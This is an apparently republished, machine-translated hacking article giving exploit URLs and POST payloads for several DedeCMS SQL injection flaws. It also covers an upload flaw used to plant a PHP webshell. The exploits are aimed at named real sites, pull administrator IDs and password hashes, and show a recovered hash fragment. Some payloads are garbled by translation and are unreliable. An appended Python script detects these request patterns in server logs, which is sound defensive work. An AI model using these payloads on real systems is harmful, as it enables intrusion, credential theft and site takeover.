2025-01-16 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)06/01 Report--
Path disclosure: data/mysql_error_trace.inc
I. DedeCMS plus/search.php injection vulnerability: fix and exploitation
0x1:
Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion] = a
If the error returned is: Safe Alert: Request Error step 2!
use the following exp:
Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0x2:
Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion] = a
If the error returned is: Safe Alert: Request Error step 1!
use the following exp:
Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
II. DedeCMS recommend.php injection
Exp:
Http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8, 9% 23 @ `\\% 27` + & _ files [type] [name] = 1.jpgdeclare _ files [type] [type] = application/octet-stream&_ files [type] [size] = 4294
III. flink.php injection
0x1: First check the CAPTCHA through flink_add.php
0x2: Send the POST request using Firefox's HackBar
Exp:
Check the version:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if (@ ```, 0x7c, (select version ()), 1jue 1dhoe 1dhowne1) #, @``` & typeid=1&url=http%3A%2F%2F&validate= CAPTCHA & _ files [webname] [name] = 1.giftings _ files [webname] [type] = paired _ files picpathcountrgifxrabbit _ fileswebname] [size] = 10percent _ files[ webname] [tmp_name] = pass\
Check the password:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if (@ ``, 0x7c, (select concat (userid,0x7c,pwd) from dede_admin limit 0pr 1)), 1meme 1meme 1meme 1) # @ ```& typeid=1&url=http%3A%2F%2F&validate= verification code & _ files [webname] [name] = 1.gifleaves _ files [webname] [type] = pairwalled picpathpathgifxname _ files [webname] [size] = 10 percent files [webname] [tmp_name] = pass\
For reference, see:
Http://www.wooyun.org/bugs/wooyun-2014-051950
IV. ajax_membergroup.php injection vulnerability
① Injection vulnerability.
The site used here: http://www.30tianlong.com/
First visit the "/data/admin/ver.txt" page to get the last upgrade time of the system.
Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; the response shown in the figure indicates that the vulnerability exists.
Then append the SQL statement.
View the administrator account
Http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
Admin
View the administrator password
Http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
What you get is 19 characters; remove the first three characters and the last character to get the administrator's 16-character MD5:
8d2 | 9b1ef9f8c5a5af42 | 9
cmd5 could not crack it, so the second method had to be tested.
② Upload vulnerability:
Just log in to the member center and then visit this page link:
Http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post
As shown in the figure, the upload page "/dialog/select_soft_post" has been successfully called through "/plus/carbuyaction.php".
So change the extension of the PHP one-sentence * to "rar" or similar, and upload it using the submission page upload1.htm
File:
Newname: submit
You can upload it successfully.
When reprinting, please credit the source: pony's Blog http://www.i0day.com
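From the defender's side, the request shapes listed in this article can be searched for in web server access logs; the Python script below is an added example, not part of the original article. The rule wording, the assumption that a legitimate membergroup value is numeric, and the sample log lines are constructed for illustration, and the flink.php requests are POST bodies, which a standard access log does not record.

```python
import re
from urllib.parse import unquote_plus

# SQL fragments that occur in the request strings quoted in this article.
SQL_HINT = re.compile(r"union|select|information_schema|@`|#@__", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(uri):
    """Return the findings for one request URI (empty list = nothing matched)."""
    path, _, query = uri.partition("?")
    script = path.rsplit("/", 1)[-1].lower()
    findings = set()
    for pair in query.split("&"):
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        base, _, index = key.partition("[")  # PHP array syntax: name[index]
        if script == "search.php" and base == "typeArr" and SQL_HINT.search(index):
            findings.add("search.php: SQL in typeArr array key")
        elif base.upper() == "_FILES":  # a client should never set this by name
            findings.add(f"{script}: request overrides _FILES")
        elif script == "ajax_membergroup.php" and base == "membergroup" and not val.isdigit():
            findings.add("ajax_membergroup.php: non-numeric membergroup")  # assumption: normally an integer
        elif script == "carbuyaction.php" and base == "rs" and "../" in val:
            findings.add("carbuyaction.php: path traversal in rs[]")
    return sorted(findings)

def scan(lines):
    """Yield (line_number, findings) for access-log lines that match a rule."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = classify(m.group(1)) if m else []
        if hits:
            yield n, hits

# Constructed sample log lines (combined log format, documentation addresses).
SAMPLE = [
    '192.0.2.10 - - [01/Jun/2014:10:00:00 +0800] "GET /plus/search.php?keyword=as HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jun/2014:10:00:05 +0800] "GET /plus/search.php?keyword=as&typeArr[%20uNion%20]=a HTTP/1.1" 200 97',
    '192.0.2.66 - - [01/Jun/2014:10:00:09 +0800] "GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=x HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jun/2014:10:01:00 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 80',
    '192.0.2.66 - - [01/Jun/2014:10:01:03 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60%27%60%20Union%20select%20userid HTTP/1.1" 200 85',
    '192.0.2.66 - - [01/Jun/2014:10:02:00 +0800] "GET /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE):
        print(n, hits)
```

A hit on these rules means the request has the shape described in the article, not that the server was vulnerable; correlate with the response size and with later requests from the same address.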